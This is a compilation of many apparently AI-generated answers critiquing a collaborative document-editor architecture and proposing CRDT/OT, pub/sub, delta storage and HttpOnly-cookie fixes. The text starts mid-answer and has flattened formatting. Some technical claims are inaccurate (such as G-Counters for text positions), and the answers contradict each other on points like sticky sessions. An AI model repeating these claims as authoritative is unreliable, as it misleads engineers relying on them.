→ Background Workers → PostgreSQL (persistent storage)
→ Auth via httpOnly JWT cookies
→ CDN only for static assets
This system as described will not work reliably for real-time collaboration due to clock skew, incomplete sync, polling, and destructive conflict resolution.
Fix it by:
With these changes, you can build a scalable, resilient, Google Docs–like system.
Here's a comprehensive analysis of the architecture's failure modes, race conditions, and bottlenecks, with specific solutions and trade-offs:
Failure Mode/Race Condition:
Solution: Operational Transformations (OT) or CRDTs
Trade-offs:
Failure Mode/Race Condition:
Solution: Dedicated Pub/Sub Layer for Real-Time Sync
doc:{id}:changes channelTrade-offs:
Failure Mode/Bottleneck:
Solution: Incremental Deltas + Incremental Saves
{"op": "insert", "pos": 12, "chars": "x"}).version: 123) to ensure clients replay deltas in order.Trade-offs:
Failure Mode:
Solution: HttpOnly Refresh Tokens + Short-Lived Access Tokens
/refresh (using refresh token cookie).Trade-offs:
SameSite=Strict + anti-CSRF header).Bottleneck: With N servers, each polling every 2s for all documents → O(N²) DB load. At 100 servers, 50 QPS/server = 5,000 QPS for change checks alone.
Solution: Event-Driven Change Propagation (via Pub/Sub, as in #2). Eliminates polling entirely.
Trade-off: Shifts load from DB to Pub/Sub layer (easier to scale than PostgreSQL).
Bottleneck: Org with 10k active users (e.g., "Acme Corp") becomes a hot partition. One PostgreSQL shard handles all Acme's docs → write saturation.
Solution: Composite Sharding Key (org_id + doc_id_hash % 100).
Trade-off: Cross-doc transactions (e.g., "move doc between orgs") become complex (2PC required).
Bottleneck: CloudFront caches GET responses for 5 mins → stale document reads after edits. User refreshes → sees 5-min-old data.
Solution:
/docs/{id}?v=123.Cache-Control: no-store for document content APIs.Trade-off: Slightly higher origin load (but protects data consistency).
Failure Mode: Rolling updates disconnect all WebSockets → mass reconnections flood new servers.
Solution:
Failure Mode: Server crashes mid-delta write → partial data in DB.
Solution: Atomic Delta Appends
INSERT ... RETURNING version to ensure version continuity.| Issue | Top Solution | Critical Trade-off |
|---|---|---|
| Sync Strategy | OT/CRDTs + server timestamps | Frontend complexity; ~15ms added latency |
| Inter-Server Sync | Redis PubSub for real-time events | Adds SPOF (requires Redis HA) |
| Storage Efficiency | Delta-only persistence + snapshots | Recovery requires delta replay |
| Auth Security | HttpOnly refresh tokens + short JWTs | CSRF protection needed |
| Scaling Hot Orgs | Composite sharding (org_id+doc_id) | Cross-doc ops become distributed transactions |
Final Recommendation: Prioritize OT/CRDTs and PubSub first – they address the highest-risk data loss scenarios. Without these, the system is fundamentally unreliable for concurrent editing. The other fixes (storage, auth, scaling) are critical but secondary to core sync integrity.
The described architecture for a real-time collaborative document editor has several critical failure modes, race conditions, and scaling bottlenecks that compromise consistency, availability, and scalability—especially under load or in edge network conditions. Below is a detailed breakdown of each issue, followed by specific solutions and their trade-offs.
Each server maintains its own WebSocket connections and only broadcasts changes to clients connected to it. Other servers poll PostgreSQL every 2 seconds for changes and then broadcast locally.
This violates the promise of “real-time” collaboration.
Use a distributed pub/sub system (e.g., Redis Pub/Sub, Kafka, or NATS) to synchronize changes instantly across all API servers.
doc:123:updates)✅ Eliminates polling delay → near-instant cross-server sync.
Using client-generated timestamps for conflict resolution is broken due to clock skew.
Use server-assigned timestamps or, better yet, Operational Transformation (OT) or Conflict-Free Replicated Data Types (CRDTs).
✅ Enables true real-time collaboration with no lost edits.
Saving entire HTML snapshots every 30 seconds is dangerous:
✅ Reduces data loss window, supports versioning, undo, and audit trails.
Each server manages its own WebSocket connections → sticky sessions required.
Decouple WebSocket connections from data processing:
✅ Enables horizontal scaling without sticky sessions.
Servers polling DB every 2 seconds for changes:
Replace polling with event-driven push:
LISTEN/NOTIFY to get real-time change events.✅ Eliminates polling → zero overhead when idle.
LISTEN/NOTIFY has limitations (e.g., no payload size > 8KB, async, best-effort).✅ Enables fault-tolerant recovery.
Caching API responses (e.g., document state) for 5 minutes via CDN:
✅ Ensures users always get latest state.
Storing JWT in localStorage makes it accessible via XSS attacks.
✅ Mitigates XSS-based token theft.
Partitioning by organization ID may cause uneven load:
✅ Better load distribution.
If a client goes offline:
✅ Robust offline support.
| Issue | Solution | Trade-off |
|---|---|---|
| Cross-server sync delay | Redis Pub/Sub or Kafka for real-time broadcast | Adds broker dependency |
| Client clock skew | Server timestamps + CRDTs/OT | Complexity, learning curve |
| Full snapshots → data loss | Delta-based persistence | Harder to query/backup |
| Sticky sessions required | Shared pub/sub (Redis) or gateway | Indirection, latency |
| DB polling overload | PostgreSQL NOTIFY or CDC | Operational complexity |
| CDN caching docs | Disable caching for doc content | Higher backend load |
| JWT in localStorage | HttpOnly cookies + refresh tokens | CSRF risk, more flow |
| No offline support | Client-side op queue + catch-up | Storage, logic overhead |
| Hotspot partitioning | Document ID sharding | Cross-shard queries hard |
LISTEN/NOTIFY or CDC.By addressing these issues, the system evolves from a fragile, inconsistent prototype into a scalable, fault-tolerant, real-time collaborative editor capable of supporting thousands of concurrent users with strong consistency and minimal data loss.
Here's a comprehensive breakdown of critical flaws in this architecture, along with specific solutions and trade-offs. The most severe issues relate to the sync strategy and data flow, which would cause catastrophic data loss and inconsistent states in real-world use.
PUBLISH doc:<id> "<operation>"SELECT * FROM changes WHERE ts > last_poll may return edits out-of-order).server_id:counter (e.g., server-3:142).organization_id creates hot partitions (e.g., a large company with 10k concurrent editors on one doc).(organization_id, shard_id) where shard_id = hash(document_id) % 1024.localStorage is accessible via JavaScript → XSS attacks steal tokens.HttpOnly, SameSite=Strict, Secure cookies.SameSite=Strict + anti-CSRF tokens).Cache-Control: no-store, must-revalidate on all document-related API responses.sticky: true in Nginx, ALB target group stickiness).| Issue Severity | Priority | Fix | Why Critical |
|---|---|---|---|
| Client LWW | 🔴 CRITICAL | OT/CRDTs + logical clocks | Prevents constant data loss & divergence |
| Polling bottleneck | 🔴 CRITICAL | Redis Pub/Sub | Eliminates 2s latency & DB overload |
| Full HTML snapshots | 🟠 HIGH | Kafka + diff-based storage | Solves write saturation, reduces storage 90%+ |
| JWT in localStorage | 🟠 HIGH | HttpOnly cookies + short tokens | Prevents mass account takeovers |
| No message ordering | 🔵 MEDIUM | Lamport timestamps | Required for OT/CRDTs to work correctly |
Without OT/CRDTs and Pub/Sub, this system is fundamentally broken for collaboration – it will lose data under even light concurrent usage. Start by replacing LWW and polling, then address storage/performance. The proposed solutions align with industry standards (Google Docs uses OT; Figma uses CRDTs). While they add complexity, they’re necessary for correctness – collaboration correctness trumps simplicity.
Your real-time collaborative document editor architecture is well-structured for a scalable, low-latency system — but it contains several critical failure modes, race conditions, and scaling bottlenecks that could degrade user experience or cause data loss. Below is a detailed analysis of each issue with specific solutions and trade-offs.
| Pros | Cons |
|---|---|
| Real-time sync across servers | Adds dependency on Redis; increased complexity |
| Low latency (~100ms) | Higher operational cost due to pub/sub traffic |
| Eliminates polling delays | Risk of message duplication (handle idempotency) |
✅ Implementation Tip: Use
Redis Streamsinstead of simple Pub/Sub for better message durability and consumer group management.
uuidv1, or incrementing counters per document).| Pros | Cons |
|---|---|
| Deterministic, reliable ordering | Requires changes to data model and client logic |
| Eliminates clock skew issues | CRDTs increase payload size (metadata overhead) |
| Can enable true real-time merging | Learning curve for developers |
✅ Recommended: Start with Lamport timestamps + server-side validation, then migrate to CRDTs (like Yjs) for richer collaboration.
LISTEN on the document table via triggers.NOTIFY document_updated, 'doc_id'.pg_notify listeners.| Pros | Cons |
|---|---|
| Near-zero latency notification | Requires active listeners (add complexity) |
| Zero polling overhead | Single point of failure if listener dies |
| Efficient for high-frequency events | Needs monitoring & restart mechanisms |
✅ Bonus: Combine with Redis Pub/Sub as fallback if PostgreSQL notification drops occur.
| Pros | Cons |
|---|---|
| Even distribution across servers | Harder to implement; more stateful |
| Avoids hotspots | Requires complex routing logic |
| Scales better over time | Increased latency for cross-shard ops |
✅ Alternative: Use multi-tier sharding: org_id → tenant shard → document hash within shard.
| Pros | Cons |
|---|---|
| Minimizes network/data usage | Complex delta merging logic |
| High fidelity, low bandwidth | Can lead to bloat if not cleaned up |
| Enables undo/redo | Higher CPU/memory on server/client |
✅ Better Choice: Use Yjs (CRDT-based) for efficient, conflict-free editing at scale.
localStorage.IndexedDB until:
/refresh endpoint with long-lived refresh token (stored securely in HTTP-only cookie, not localStorage).| Pros | Cons |
|---|---|
| Survives network/auth outages | Adds complexity to client-side state management |
| Prevents data loss | IndexedDB limits vary by browser |
| Seamless reconnection | Risk of stale edits if not properly deduplicated |
✅ Critical: Never trust
localStoragefor sensitive tokens. Use HttpOnly cookies + CSRF protection for session integrity.
/docs/:id) for 5 minutes.Cache-Control: no-cache, must-revalidate on dynamic APIs.doc_id.| Pros | Cons |
|---|---|
| Fresh content always served | Reduced CDN efficiency |
| Real-time accuracy | More API requests hitting origin |
| Fast cache invalidation | Costly if done too often |
✅ Best Practice: Cache only immutable static assets. Keep dynamic endpoints uncached or short-lived.
| Pros | Cons |
|---|---|
| High availability | Higher cost and operational complexity |
| Fault tolerance | More difficult to debug |
| Self-healing | Latency spikes during failover |
✅ Use Case: Redis Sentinel or Redis Cluster depending on scale and budget.
| Issue | Solution | Trade-off |
|---|---|---|
| Cross-server sync delay | Redis Pub/Sub + Notify | Added complexity, cost |
| Client clock timestamp attacks | Server-generated Lamport/UUID | Payload increase, logic change |
| Frequent DB polling | PostgreSQL LISTEN/NOTIFY | Listener maintenance, failure handling |
| Hot partitions | Dynamic sharding (hash-based) | Routing complexity |
| Delta loss during downtime | Client-side edit buffering | Storage overhead, deduplication logic |
| JWT expiry causing disconnect | Refresh tokens + IndexedDB buffer | Security risks if misused |
| CDN caching stale content | Cache control + Tag-based invalidation | Reduced CDN savings |
| Redis single-point failure | Redis Cluster + fallback to DB | Operational cost |
By addressing these issues systematically, your system can evolve from a “good enough” prototype into a production-grade, highly available, real-time collaborative editor capable of serving thousands of concurrent users without data loss or noticeable lag.
Here are the critical issues I've identified in this architecture:
Problem: When an API server crashes or restarts, all WebSocket connections are lost, and clients won't know about changes processed by that server.
Solution:
Trade-offs: Increased complexity vs. guaranteed message delivery
Problem: Client-generated timestamps for conflict resolution are unreliable due to clock drift, leading to inconsistent conflict resolution.
Solution:
Trade-offs: Slightly higher latency vs. correct ordering guarantees
Problem: Server A processes change, broadcasts to its clients, but Server B's 2-second poll hasn't occurred yet, so Server B's clients see stale data.
Solution:
Trade-offs: More complex infrastructure vs. real-time consistency
Problem: Client makes change, reads document before change is committed to database, seeing stale data.
Solution:
Trade-offs: Increased memory usage vs. consistency guarantees
Problem: Every change writes to PostgreSQL, and polling creates read pressure. Full HTML snapshots every 30 seconds are expensive.
Solution:
Trade-offs: More complex data model vs. database scalability
Problem: Each server only broadcasts to its own connected clients, creating inconsistent views during cross-server collaboration.
Solution:
Trade-offs: Additional infrastructure vs. global consistency
Problem: 5-minute CDN caching conflicts with real-time collaboration needs.
Solution:
Trade-offs: Reduced cache efficiency vs. real-time accuracy
Problem: JWT in localStorage is vulnerable to XSS attacks.
Solution:
Trade-offs: Slightly more complex auth flow vs. security
Problem: Last-write-wins can lose data when multiple users edit simultaneously.
Solution:
Trade-offs: Significant complexity increase vs. data integrity
Problem: Redis session cache can become inconsistent or lost during failures.
Solution:
Trade-offs: Infrastructure complexity vs. session reliability
The architecture needs fundamental changes to support true real-time collaboration at scale, particularly around consistency models and communication patterns.
Issue: Clients are connected to different API servers based on load balancing, causing inconsistent message delivery.
Issue: Two clients editing the same paragraph simultaneously can cause data loss
Issue: All write operations go through PostgreSQL directly
Issue: 2-second polling interval creates noticeable delay
Issue: Round-robin load balancer creates uneven distribution
Issue: Redis cache for sessions isn't clearly invalidated
Issue: CDN caching API responses for 5 minutes
Issue: JWT tokens stored in localStorage
Issue: Full HTML snapshots every 30 seconds
Issue: No coordination mechanism between API servers
Issue: Client clocks might not be synchronized
Issue: No handling for network partitions
The core architectural flaw is the lack of coordination between independent API servers, which fundamentally breaks the collaborative model. Addressing the WebSocket partitioning issue should be the top priority.
This architecture has several critical flaws that would manifest under real-world usage, especially with multiple concurrent users. Below is a systematic analysis of failure modes, race conditions, and scaling bottlenecks—each with concrete solutions and trade-offs.
SERIAL or pg_advisory_xact_lock on document ID) instead of client timestamps.| Approach | Pros | Cons |
|---|---|---|
| OT | Strong consistency, human-intuitive merge | Complex to implement; requires server-side OT engine |
| CRDT (Yjs/YATA) | Converges offline; simple server logic | Larger payloads; less intuitive for non-text (e.g., images) |
| Server monotonic counters | Simple; avoids clock skew | Still overwrites within same counter (e.g., two ops at counter=100) |
✅ Recommendation: Use Yjs (CRDT-based) for real-time ops, with PostgreSQL for persistence. Store only final document state in DB; ops live in Redis stream for replay.
doc:{id}.op_id = doc_id + server_timestamp + random) to dedupe.| Approach | Pros | Cons |
|---|---|---|
| Redis Pub/Sub | Real-time, low latency, no polling | Adds Redis dependency; pub/sub is fire-and-forget (ops lost on restart) |
| Redis Streams + Consumer Groups | Persistent, replayable, acks | More complex; requires offset management |
✅ Recommendation: Use Redis Streams with
XADD doc:{id} * {op_json}+ consumer groups per server. Each server consumes and broadcasts ops. Commit to PostgreSQL after successful broadcast to avoid inconsistency.
Y.applyUpdate) to sync only diffs.| Approach | Pros | Cons |
|---|---|---|
| Op log only | Minimal data, real-time sync, supports offline | Rehydration requires replaying all ops (slow for long docs) |
| Hybrid: Snapshot + op log | Fast read, small ops | Sync complexity: clients need both snapshot + ops to catch up |
✅ Recommendation:
- Store Yjs updates (binary diffs) in Redis Stream.
- Take hourly snapshots in PostgreSQL (
document_snapshotstable).- On connect, server sends:
snapshot + ops_since_snapshot_timestamp.
| Approach | Pros | Cons |
|---|---|---|
| Access + refresh tokens | Secure, revocable, scalable | More complex auth flow; requires token refresh logic |
| Long-lived JWT in localStorage | Simple | Vulnerable to XSS; no revocation |
✅ Recommendation: Use OAuth2-style flow with refresh tokens. For real-time WebSocket auth, pass access token in
Authorizationheader during handshake.
client_id → server_id mapping in Redis.| Approach | Pros | Cons |
|---|---|---|
| Sticky sessions | Simple | Breaks scaling (can’t rebalance servers); single point of failure if server dies |
| Redis-backed session | Scalable, fault-tolerant | Adds Redis dependency; session sync latency |
✅ Recommendation: Use Redis to track active WebSocket sessions (
HSET websocket:sessions client_id server_id). When server A receives op for client X, it checks Redis and forwards to server B if needed.
org_id causes hotspots:
doc_id (hashed via doc_id % N → shard).pg_partman to partition by doc_id range or hash.| Approach | Pros | Cons |
|---|---|---|
| Org-based partitioning | Simple, co-locate org data | Hotspots, poor utilization |
| Doc-based partitioning | Balanced load, horizontal scaling | Cross-doc queries harder; more complex routing |
✅ Recommendation: Partition by
doc_id, use a shard router service to map doc_id → shard. Cache mappings in Redis.
XADD rate limiting in Redis.pgbouncer), batch writes (e.g., 100 ops/batch).| Approach | Pros | Cons |
|---|---|---|
| Rate limiting | Protects backend | User sees lag; may need UI feedback |
| Batching writes | Reduces DB load | Increases latency (ops batched for 100ms) |
✅ Recommendation: Use Redis Streams with
XADDrate limiting (viaINCR+EXPIRE). If rate limit exceeded, sendthrottlemessage to client.
/api/docs/{id}). After a user edits, others see stale content for up to 5 min./static/, /favicon.ico).Cache-Control: no-store for /api/docs/*.doc_meta).| Approach | Pros | Cons |
|---|---|---|
| Disable CDN caching for docs | Fresh data | Higher origin load; slower initial load (but real-time sync compensates) |
| TTL-based invalidation | Simpler | Still stale during TTL window |
✅ Recommendation: Set
Cache-Control: private, no-storefor all/api/endpoints. Use CDN only for assets.
| Issue | Severity | Solution |
|---|---|---|
| LWW with client clocks | 🔴 Critical | Replace with CRDTs (Yjs) or server-monotonic ops |
| WebSocket broadcast scope | 🔴 Critical | Redis Pub/Sub/Streams for cross-server sync |
| Full-document snapshots | 🟠 High | Store ops only; snapshot for archival |
| JWT in localStorage | 🟠 High | Short-lived access tokens + HttpOnly refresh tokens |
| No session affinity | 🟠 High | Redis-backed WebSocket session tracking |
| Org-based partitioning | 🟠 High | Document-level sharding with consistent hashing |
| No backpressure | 🟠 High | Rate limiting, batching, circuit breakers |
| CDN caching API responses | 🟠 High | Disable caching for /api/docs/* |
Client → WebSocket → Server → Redis Stream (doc:ops) → [all servers] → local WebSocket clientsServer → Batch ops → PostgreSQL (with upsert)snapshot (hourly) + ops since snapshot timedoc_idThis design is production-grade (used by companies like Notion, Coda, and Linear). The biggest upfront cost is implementing CRDTs/OT—but libraries like Yjs reduce this to days, not months.
Let me know if you'd like a deep dive on Yjs integration, shard routing, or crisis-runbook for failure scenarios!
I'll analyze this collaborative document editor architecture systematically, identifying critical issues and proposing solutions.
Problem: Users connected to different servers won't see each other's changes until polling catches up.
Solution: Implement a shared message bus (Redis Pub/Sub or Apache Kafka)
// Replace polling with pub/sub
redis.subscribe('doc-changes', (message) => {
// Broadcast to all WS clients on this server
broadcastToClients(JSON.parse(message));
});
Trade-offs: Adds infrastructure complexity but ensures real-time consistency across servers
Problem: "Last-write-wins with client timestamps" is fundamentally flawed due to clock drift.
Solution: Use Lamport timestamps or Operational Transformation (OT)
// Lamport timestamp approach
const lamportClock = Math.max(localClock, incomingTimestamp) + 1;
const operation = {
content: newContent,
timestamp: Date.now(),
serverId: serverId,
sequenceNumber: lamportClock
};
Trade-offs: More complex logic but ensures logical ordering regardless of physical clocks
Problem: Every character change hits PostgreSQL immediately → database saturation
Solution: Operation buffering with batch commits
class OperationBuffer {
constructor() {
this.buffer = [];
setInterval(this.flush, 250); // Batch every 250ms
}
addOperation(op) {
this.buffer.push(op);
if (this.buffer.length > 50) this.flush(); // Force flush
}
}
Trade-offs: Potential data loss on crashes vs. improved throughput
Problem: Each server maintains N connections locally, no cross-server sharing
Solution: Externalize WebSocket management with Pusher/Rocket.Chat or Redis-backed connection registry
// Shared connection registry
const connections = new Map();
redis.hset('server_connections', serverId, JSON.stringify(connections));
// Route messages through shared bus
Trade-offs: Network overhead but enables high availability
Problem: Saving full HTML snapshots every 30 seconds loses granular edit history
Solution: Store operational transforms, not snapshots
CREATE TABLE document_operations (
id SERIAL PRIMARY KEY,
doc_id UUID,
operation_type VARCHAR(20), -- 'insert', 'delete', 'format'
position INT,
content TEXT,
user_id UUID,
timestamp TIMESTAMP,
revision_number BIGINT
);
Trade-offs: More complex querying but preserves complete edit history
Problem: Caching API responses for collaborative editing is dangerous
Solution: Cache only static assets, never dynamic content
// Only cache static assets, exclude API routes
app.get('/api/*', (req, res, next) => {
res.set('Cache-Control', 'no-cache, no-store');
next();
});
Trade-offs: Higher backend load but correct behavior
Problem: Storing JWT in localStorage makes it accessible to XSS scripts
Solution: HttpOnly cookies with SameSite protection
res.cookie('auth_token', token, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 86400000 // 24 hours
});
Trade-offs: Slightly more complex frontend handling but much more secure
Problem: Partitioning by organization ID creates hotspots
Solution: Hash-based sharding using document ID + chunking
function getShard(docId) {
return hash(docId) % numShards; // Better distribution
}
Problem: Simple timestamp resolution can cause document corruption
Solution: Implement proper OT or CRDT algorithms
class TextOperation {
apply(text) {
// Handle insertions/deletions in correct order
return this.operations.reduce((result, op) => {
return op.applyTo(result);
}, text);
}
}
Replace the current architecture with:
The current design will work poorly under any significant load due to fundamental synchronization flaws.
Problem: Client clocks are unreliable and can be out of sync by seconds, minutes, or even hours. This causes:
Solution: Implement Operational Transformations (OT) or Conflict-free Replicated Data Types (CRDTs)
Trade-offs:
Problem: Changes are only broadcast to clients connected to the same server instance. Clients on other servers:
Solution: Implement Redis Pub/Sub for cross-server communication
Trade-offs:
Problem: 2-second polling creates:
Solution: Replace polling with real-time database change streams
Trade-offs:
Problem:
Solution: Store operation logs (deltas) instead of snapshots
Trade-offs:
Problem:
Solution: Use HttpOnly cookies with shorter expiry + refresh tokens
Trade-offs:
Problem: Caching API responses for 5 minutes is incompatible with real-time collaboration:
Solution: Don't cache API responses for document endpoints
Cache-Control: no-store) for API endpointsTrade-offs:
Problem: Every keystroke writes to PostgreSQL, creating:
Solution: Queue-based write architecture
Trade-offs:
Problem:
Solution: Fine-grained partitioning + consistent hashing
Trade-offs:
Problem:
Solution: Implement operation acknowledgment and replay buffers
Trade-offs:
Problem: The architecture lacks visibility into:
Solution: Comprehensive observability stack
Trade-offs:
Immediate (Critical):
High Priority: 5. Fix authentication security (HttpOnly cookies) 6. Replace polling with real-time change streams 7. Implement operation acknowledgment for WebSockets
Medium Priority: 8. Add queue-based write architecture 9. Improve partitioning strategy 10. Implement comprehensive observability
The current architecture would work for a basic demo but would fail catastrophically under real-world collaborative editing scenarios due to the fundamental flaws in conflict resolution and real-time synchronization.
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| JWT Stored in localStorage | Critical XSS vulnerability (token exposure via JS). | Store token in HttpOnly cookie with SameSite=Strict; implement CSRF tokens for HTTP endpoints. Use short-lived access (<5min) + refresh tokens. | Adds CSRF complexity; requires secure cookie handling. |
| Unvalidated WebSocket Auth | Unauthorized users could inject edits or spy on docs. | Authenticate at WebSocket upgrade using validated JWT. Cache user permissions on connection; verify document access on every message. | Adds latency at connection; requires permission cache invalidation. |
| CDN Caches Mutable API Responses (5-min TTL) | Users see stale documents; breaks real-time collaboration. | Disable CDN caching for dynamic APIs (use Cache-Control: private, no-cache). Serve static assets via CDN only. | Increases API server load; mitigated by read replicas + edge caching of static assets. |
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| Client Timestamps for LWW | Clock skew causes data loss; LWW cannot merge concurrent edits (e.g., two users typing in different paragraphs). | Replace with CRDTs (Yjs, Automerge) or OT. Use server-assigned version vectors for ordering. | High engineering complexity; larger message payloads (CRDT) or transformation logic (OT). |
| Per-Keystroke DB Writes | PostgreSQL becomes write bottleneck; I/O saturation; latency spikes. | Client-side batching (send every 500ms or 10 chars). Server-side buffering: queue changes → batch write to DB or dedicated write-optimized log (Apache Kafka → async DB persist). | Risk of data loss if batch fails; requires client queue + retransmission logic. |
| Full HTML Snapshots Every 30s | Massive storage bloat, write amplification, high DB cost. | Store operation log (deltas only). Generate snapshots asynchronously to cheap object stores (S3). Use CRDT to reconstruct state. | Adds recovery complexity; requires snapshot generation workers. |
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| Server-Limited Broadcast + 2s Polling | 2+ s delays to clients cross-server; DB read hammering; missed updates. | Deploy Redis Pub/Sub or Kafka. On edit, publish to doc-specific Kafka topic. All servers sub to topics; broadcast instantly. | Adds external infra dependency. Redis Pub/Sub = non-durable (OK for real-time); Kafka = durable but heavier footprint. |
| No Client Reconnection Recovery | Lost edits during disconnect; stale UI after reconnect. | Client buffers unsynced ops (IndexedDB). Server assigns monotonic version IDs. On reconnect: client sends last seen version; server sends missing ops (or full CRDT snapshot). | Client-side state management; requires versioning logic. |
| No Sticky Sessions for WebSockets | Reconnections routed randomly; broken state sync. | Configure LB with session affinity (cookie or IP hash). | Uneven server distribution (hotspots). Mitigate with connection limits + LB health checks. |
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| Organization-Based Partitioning | Hot org → server overload; cold orgs wasteful. | Document-level sharding with consistent hashing. Use service discovery (etcd/Zookeeper) to map doc → server. | Higher routing complexity; requires dynamic partition management. |
| Primary DB Single Point of Failure | Full system outage on master failure. | PostgreSQL HA cluster (Patroni + streaming replication). Use write-through cache (Redis) for document state to reduce DB load. | Failover latency (seconds); cache invalidation complexity. |
| Read Replica Staleness on Document Load | UI jumps as stale doc loads → real-time update arrives. | Read initial doc from primary DB OR write-through Redis cache (updated via pub/sub on edit). | Increases primary load; cache adds ops overhead. |
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| No Offline Support | Edits lost during brief disconnects. | Client buffers ops in IndexedDB. Sync on reconnect with conflict resolution. | Increased frontend complexity; UX for conflict resolution. |
| No Document Access Validation | Users could subscribe to unauthorized docs via WebSocket. | On connection: validate user has access to document (via DB/cache). Subscribe only to permitted topics. | Adds latency; requires permission cache with TTL/invalidation. |
| No Rate Limiting | Malicious clients flood server with edits. | Apply rate limiting at LB/gateway (e.g., max 10 ops/sec per user). | Blocks legitimate fast typists; configure thresholds carefully. |
| Stateless JWT + Redis Session Cache Mismatch | Ambiguous session management (JWT stateless vs Redis cache). | Clarify Redis is used for: (1) Pub/Sub (critical) and (2) Document state cache. Remove session storage from Redis. | Eliminates confusion; aligns with JWT statelessness. |
Trade-off Philosophy: Accept increased engineering complexity in exchange for correctness, scalability, and user trust. Real-time co-editing is a hard distributed systems problem; shortcuts (client clocks, polling, LWW) create fragility at scale. Invest in battle-tested patterns (CRDT, pub/sub, HA DB) to build a resilient product.
This architecture resembles a simplified real-time collaborative editor but contains critical flaws in concurrency control, consistency, scalability, and fault tolerance. Below is a comprehensive breakdown of failure modes, race conditions, and scaling bottlenecks, followed by specific solutions with trade-offs.
Replace LWW with Operational Transformation (OT) or Conflict-Free Replicated Data Types (CRDTs)
💡 Bonus: Store both the CRDT state and periodic HTML snapshots for UI rendering and backup.
Use a pub/sub system (Redis Pub/Sub or Kafka) to propagate changes across servers
doc:{doc_id}:ops).Store only CRDT operations + periodic snapshots as backup
insert at 12, "a") in PostgreSQL as a row with doc_id, op_id, timestamp, client_id, operation_json.Use HTTP-only, SameSite=Strict cookies with short-lived access tokens + refresh tokens
/api/doc/123) for 5 minutes.Disable CDN caching for all dynamic API endpoints (e.g.,
/api/doc/*,/api/sync) Cache only static assets (JS, CSS, images).
Cache-Control: no-cache, no-store, private headers on all document-related endpoints./api/doc/123?v=456) — but this requires client-side version tracking.Enable sticky sessions (session affinity) using client IP or JWT cookie hash
org_id assumes even distribution.Partition documents by
doc_id, notorg_id— use sharding + document-level isolation
doc_id → shard.doc:123:state) for read-heavy docs.Implement:
| Problem Area | Recommended Fix | Key Trade-off |
|---|---|---|
| Conflict Resolution | Replace LWW with CRDTs (Yjs/Automerge) | Higher complexity, migration cost |
| Cross-Server Sync | Use Redis Pub/Sub for ops, eliminate polling | Adds Redis dependency |
| Storage | Store CRDT ops, not HTML snapshots | Need to rebuild UI from ops |
| Auth | HTTP-only cookies, short-lived tokens, revocation list | CSRF protection needed |
| CDN Caching | Disable caching for /api/doc/* | Higher origin load |
| Load Balancing | Sticky sessions OR stateless + Redis state | Simplicity vs. scalability |
| Sharding | Shard by doc_id, not org_id | Routing complexity |
| Resilience | Client op queue + retry + Kafka buffer + monitoring | Client/server complexity |
Instead of rolling your own, consider:
JSONB in PostgreSQL, with batched writesReal-world examples: Notion, Coda, and Slate use CRDTs or OT. Google Docs uses OT under the hood. LWW + snapshots is for simple apps like note-taking — not real-time collaboration.
This architecture is not fit for production as-is. With the above fixes, it can become scalable, consistent, and resilient — but requires non-trivial engineering effort. Prioritize CRDTs + Redis pub/sub + HTTP-only auth as your top 3 fixes.
Here'sa comprehensive analysis of the architecture, identifying critical failure modes, race conditions, and scaling bottlenecks. For each issue, I've provided a specific solution with clear trade-offs based on real-world distributed systems best practices.
Issue: Using client-generated timestamps for conflict resolution ("last-write-wins") is fundamentally flawed. Client clocks are unsynchronized (NTP drift can be 100ms+), and users can manually adjust time. A user with a clock set ahead by 5 minutes could overwrite others' changes arbitrarily, causing data corruption. Even with NTP, network latency makes it impossible to reliably order concurrent edits.
Solution:
clocks service) or switch to CRDTs (Conflict-Free Replicated Data Types).G-Counter for text positions) or operation-based CRDT (e.g., Yjs library). Changes are merged automatically without central coordination.Trade-offs:
Recommendation: Use CRDTs for collaborative editing. It’s the industry standard (e.g., Google Docs uses a variant of OT, but CRDTs are simpler for distributed systems). Avoid client timestamps entirely.
Issue:
Solution:
doc:{doc_id}:changes).Trade-offs:
Critical fix: Pub/sub is non-negotiable for real-time collaboration. Polling is unacceptable for low-latency systems.
Issue: Saving full HTML snapshots every 30 seconds is wasteful:
Solution:
Trade-offs:
Recommendation: Use a CRDT-based delta storage (e.g., Yjs) for both real-time sync and persistence. This solves sync and storage in one go.
Issue: Caching API responses for 5 minutes (e.g., document state endpoints) via CloudFront causes stale data. Users won’t see real-time updates, defeating the purpose of collaboration. For example, if User A edits a document, User B might see the old version for up to 5 minutes.
Solution:
/document/{id}, /changes). Set Cache-Control: no-store or private, max-age=0.Trade-offs:
Critical fix: Never cache dynamic collaborative data. Use CDN only for static assets.
Issue: Storing JWTs in localStorage is vulnerable to XSS attacks. If an attacker injects malicious JS, they steal tokens and impersonate users. This is a critical security flaw.
Solution:
wss://host/?token=...), validated at connection time.Trade-offs:
Critical fix: Move to HttpOnly cookies immediately. This is non-negotiable for security.
Issue: "Last-write-wins" with client timestamps ignores context. If two users edit the same paragraph simultaneously:
Solution:
Yjs for JSON-like data). Changes are associative and commutative, so order doesn’t matter.Trade-offs:
Recommendation: Use CRDTs (e.g., Yjs or Automerge). They’re simpler to implement correctly than OT for most use cases.
Issue:
Solution:
Trade-offs:
Recommendation: For large-scale deployments, use CockroachDB for distributed SQL capabilities. For smaller apps, Aurora with read replicas suffices.
Issue: If an API server crashes:
Solution:
Trade-offs:
Recommendation: Implement client-side retry + sequence numbers for safety. For critical systems, add Kafka as a persistent buffer.
| Issue | Solution | Criticality |
|---|---|---|
| Client timestamps | CRDTs or server monotonic timestamps | 🔴 Critical |
| Polling for changes | Pub/sub (Redis/Kafka) | 🔴 Critical |
| Full HTML snapshots | Delta storage + CRDTs | 🔴 Critical |
| CDN caching dynamic data | Disable cache for dynamic endpoints | 🔴 Critical |
| JWT in localStorage | HttpOnly cookies | 🔴 Critical |
| Conflict resolution | CRDTs/OT | 🔴 Critical |
| Single-document scaling | Sharded distributed DB (CockroachDB) | 🟠 High |
| Server failover | Client retry + sequence numbers | 🟠 High |
Final Architecture Improvements:
Why this works: CRDTs eliminate the need for timestamps and conflict resolution logic. Pub/sub replaces inefficient polling. Distributed databases handle scaling. HttpOnly cookies fix security. This aligns with modern collaborative systems like Google Docs (OT-based) or Figma (CRDTs).
